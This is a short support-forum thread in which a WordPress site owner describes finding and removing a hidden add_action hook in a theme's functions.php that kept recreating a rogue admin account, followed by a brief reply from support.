[Resolved] Hacker placed admin action within functions.php

Home Forums Support Hacker placed admin action within functions.php

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
  • #1408904

    Just to let you guys know, I was stupid enough to grant access to my dev site during lockdown to a plugin developer I’d trusted before on a previous project. Yesterday for some reason I thought to check the user member status and realised there was an additional admin I didn’t recognise. I went to delete the user but it re-appeared about 2 minutes later. I did some online research and checked the user table within the wp db via PHPMyAdmin. Sure enough there was the same admin I’d just deleted. I tried changing the email and then deleting but it re-appeared again after 2 minutes. I then thought to change the user role and remove all privileges while I investigated further. This held. I also installed the iThemes Security plugin on the recommendation of a WordPress support article. I managed to block all access to the dev site apart from myself and this also appeared to work as I then started to notice multiple failed login attempts (I now have 350 Brute Force attempts and IPs logged).

    I then thought to download all WordPress files and perform a text search for this user’s details and bingo! I found an add action entry placed at the bottom of the generatepress main theme’s functions.php. Once removed I managed to permanently delete the admin in question.

    Thought to share this experience just in case anyone else experiences the same problem.

    Customer Support

    Hi there,

    That’s a shady thing to do.

    Glad you’ve got it figured out!

Viewing 2 posts - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.